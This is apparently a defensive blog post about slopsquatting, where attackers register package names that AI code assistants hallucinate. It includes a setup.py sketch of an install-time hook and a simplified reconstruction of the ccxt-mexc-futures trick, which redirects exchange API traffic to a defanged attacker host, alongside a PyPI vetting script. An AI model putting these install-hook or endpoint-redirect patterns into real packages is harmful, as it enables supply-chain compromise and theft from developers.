Slopsquatting: The AI-Induced Supply Chain Threat You Shouldn’t Ignore

Over the past few years, we’ve seen threat actors get more creative in how they exploit the software supply chain. But the latest twist, slopsquatting, adds a new, AI-fueled dimension that most of us didn’t see coming. It’s like typosquatting’s smarter, stealthier cousin, and it’s quietly creeping into developer workflows, especially those that rely heavily on AI code assistants.

What Is Slopsquatting?

Slopsquatting is a new type of supply chain attack that exploits the trust developers place in AI-generated code. Essentially, it works like this: AI tools like ChatGPT, Copilot, or Code Llama sometimes “hallucinate”: they suggest package names that don’t actually exist. When developers blindly trust and install these hallucinated packages, attackers who’ve pre-registered them can inject malicious code directly into the development environment.
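
Why is a single pip install enough to get compromised? Because Python packaging lets a package run arbitrary code at install time. Here’s a minimal sketch of what an attacker who pre-registered a hallucinated name could publish; the package name and “payload” below are hypothetical illustrations, not code from a real attack:

```python
# setup.py -- a minimal sketch of why installing a hallucinated package is enough.
# Everything here is a hypothetical illustration, not code from a real attack.
from setuptools import setup
from setuptools.command.install import install


class MaliciousInstall(install):
    """pip executes this hook during installation, with the developer's privileges."""

    def run(self):
        # A real attacker's payload would go here: exfiltrate credentials,
        # plant a backdoor, open a reverse shell, and so on.
        print("arbitrary code is now running on the developer's machine")
        super().run()


setup(
    name="example-hallucinated-pkg",  # hypothetical name an AI model might invent
    version="0.0.1",
    cmdclass={"install": MaliciousInstall},
)
```

The point: the compromise happens at install time, before you’ve imported (or even read) a single line of the package.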

A large-scale analysis of 576,000 code samples revealed something alarming: around 20% of AI-suggested packages didn’t exist. Open-source models were more prone to this (21.7%) compared to commercial models (5.2%). That’s a staggering number when you consider how many developers are using these tools daily.

The Perfect Storm for Exploitation

Languages like Python and JavaScript thrive on massive, centralized package ecosystems (like PyPI or npm). That openness, combined with the growing influence of AI-generated code, makes it easy for attackers to sneak in fake packages.

A study of 16 code-generating models, including GPT-4, GPT-3.5, DeepSeek, and Mistral, showed that roughly 1 in 5 recommended packages were completely made up. That’s not just a fluke; it’s a vulnerability in how modern development is being done.

Slopsquatting in Context: How It Compares to Other Threats

To better understand slopsquatting, let’s look at how it stacks up against similar attacks we’ve seen in the past:

| Attack Type | Vector | Target | Method | Why Slopsquatting Is Different |
| --- | --- | --- | --- | --- |
| Typosquatting | Domains / package names | Users & developers | Registers misspelled names (e.g., expresss instead of express) | Exploits manual mistakes; relies on human error. |
| Dependency Confusion | Internal package names | Enterprise dev environments | Uploads fake public packages with names used in private/internal projects | Exploits internal naming conflicts; doesn’t rely on AI. |
| Newly Registered Domains (NRDs) | Domains | Users | Spins up fresh domains for phishing, malware, or C2 | Targets users, not code; easy to detect after a short period. |
| Slopsquatting | AI-generated hallucinated package names | Developers using AI tools | Registers non-existent packages hallucinated by AI models | Exploits trust in AI tools; harder to detect; not based on typos or private/internal naming. |

Slopsquatting vs. Typosquatting: A New Twist on an Old Trick

If you’re familiar with typosquatting, where attackers register typo’d domains and package names to catch unsuspecting victims, then slopsquatting will feel oddly familiar. But instead of targeting end users through URLs, slopsquatting targets developers through AI-generated code suggestions.

The real kicker? These hallucinated suggestions don’t come from bad intentions in the AI model; they stem from gaps in training data and unpredictable prompt contexts. That makes them tough to detect ahead of time, for AI vendors and security tools alike.

A Real Example: ccxt-mexc-futures and the Slopsquatting Attack Vector

Let’s talk about a real-world slopsquatting incident that’s been making waves.
A malicious Python package called ccxt-mexc-futures appeared on PyPI. It masqueraded as an extension of ccxt, a legitimate cryptocurrency trading library. Once installed, it tampered with three critical functions: describe, sign, and prepare_request_headers.

The result? It secretly redirected trading activity on the MEXC exchange to a fake server (v3.mexc.workers[.]dev), which then funneled those orders to a rogue platform at greentreeone[.]com. Over 1,000 developers downloaded this fake package before it was taken down.
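
The actual payload was more elaborate than this, but the core trick is ordinary method overriding. Here’s a simplified sketch of the technique; the code is illustrative, not the real malware, and ccxt nests its endpoint configuration more deeply in practice:

```python
# A simplified sketch of the tampering technique (illustrative, not the real malware).
# The fake package shadows the legitimate exchange class and quietly overrides
# the methods that configure endpoints and sign API requests.
import ccxt  # the legitimate library the fake package piggybacks on


class mexc(ccxt.mexc):
    def describe(self):
        desc = super().describe()
        # Point the exchange at an attacker-controlled server instead of MEXC.
        # (Hostname defanged as in the incident reports; ccxt's real endpoint
        # URLs are nested more deeply than this.)
        desc["urls"]["api"] = "https://v3.mexc.workers[.]dev"
        return desc

    def sign(self, path, api="public", method="GET", params={}, headers=None, body=None):
        # The request is fully built and signed at this point, so the attacker
        # can inspect or reroute every order before it leaves the machine.
        return super().sign(path, api, method, params, headers, body)
```

Because the subclass behaves exactly like the real one for everything else, nothing looks wrong until the orders land on the attacker’s server.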

Worse, these fake modules often open reverse shells upon installation, handing the attacker persistent access. That’s an open door to sensitive data, internal systems, or worse.

[Figure: how code packages are infected]

Real-World Scenario

Imagine this: You’re building a new feature and turn to an AI assistant for help. It recommends importing fastapi-utils. Sounds legit, right? You run pip install fastapi-utils without checking who actually publishes that name, only to discover too late that no legitimate project ever did: a malicious actor noticed this common hallucination and registered the name first. Just like that, you’ve compromised your application.

[Screenshot: Python code importing fastapi-utils]

How to Defend Against Slopsquatting

While the threat is new, the defense strategies don’t require a complete overhaul, just a shift in mindset and tooling. Here’s how to protect yourself and your team:

  • Manual Verification: Always verify AI-suggested packages against official sources like PyPI or npm (see the verification sketch after this list).
  • Dependency Locking: Use dependency managers that lock to known, verified versions.
  • Sandbox Testing: Test AI-generated code in isolated environments before pushing it into production.
  • Tune AI Settings: Lowering the “temperature” setting in AI tools can reduce hallucination by limiting randomness in responses.
  • Team Awareness: Make sure your team understands the risks associated with AI-generated code and knows how to vet packages properly.
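
For the first item on that list, even a tiny script beats installing blind. Here’s a minimal sketch that checks a suggested package against PyPI’s public JSON API; the 90-day “young package” threshold is an illustrative heuristic, not an established rule:

```python
# check_pkg.py -- a minimal sketch of vetting an AI-suggested package via
# PyPI's public JSON API. The age threshold is an illustrative heuristic.
import json
import sys
from datetime import datetime, timezone
from urllib.error import HTTPError
from urllib.request import urlopen


def vet_package(name: str) -> None:
    try:
        with urlopen(f"https://pypi.org/pypi/{name}/json") as resp:
            data = json.load(resp)
    except HTTPError as err:
        if err.code == 404:
            print(f"'{name}' does not exist on PyPI -- likely a hallucination.")
            return
        raise

    # Find the earliest upload across all releases: a brand-new package whose
    # name AI models keep suggesting is a prime slopsquatting candidate.
    uploads = [
        datetime.fromisoformat(f["upload_time_iso_8601"].replace("Z", "+00:00"))
        for files in data["releases"].values()
        for f in files
    ]
    if not uploads:
        print(f"'{name}' is registered but has no files -- treat as suspect.")
        return

    age_days = (datetime.now(timezone.utc) - min(uploads)).days
    print(f"'{name}': first upload {age_days} days ago, "
          f"{len(data['releases'])} release(s).")
    if age_days < 90:
        print("Very young package -- check the maintainer and repo before installing.")


if __name__ == "__main__":
    vet_package(sys.argv[1])
```

Running python check_pkg.py <package-name> before a first install takes seconds and catches both outright hallucinations (404s) and suspiciously fresh registrations.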

Looking Ahead

Slopsquatting is a warning sign: We’re entering a new phase in software development, where the code we use is often written, or at least suggested, by machines. That means security has to shift left, all the way to the IDE where code gets written.
The good news is that the community is catching on. Researchers are pushing for better AI training, smarter dependency vetting tools, and stronger norms around package verification. The combo of good tools (like SBOMs and AI-aware scanners) and good habits (like reviewing code suggestions) will go a long way.

Final Thought

We’ve trusted AI to help us code faster, and in many ways, it delivers. But slopsquatting proves that speed without scrutiny is risky. By staying informed, verifying our tools, and evolving our security posture, we can keep building fast and building safe.

